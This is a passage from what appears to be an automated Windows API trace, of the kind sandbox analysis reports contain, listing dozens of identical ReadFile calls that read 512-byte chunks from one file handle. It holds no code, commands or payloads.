lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, 
lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile 
(in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 
[0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, 
lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 
lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: 
lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, 
lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile 
